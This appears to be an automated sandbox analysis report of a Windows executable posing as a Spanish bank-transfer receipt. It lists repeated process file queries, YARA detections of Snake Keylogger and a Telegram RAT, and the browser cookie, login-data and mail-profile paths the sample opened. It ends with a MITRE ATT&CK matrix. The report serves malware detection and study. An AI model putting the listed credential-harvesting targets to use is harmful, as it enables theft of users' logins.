Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe

0_2_0040322B

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 5272, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 5272, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 5272, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	4 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
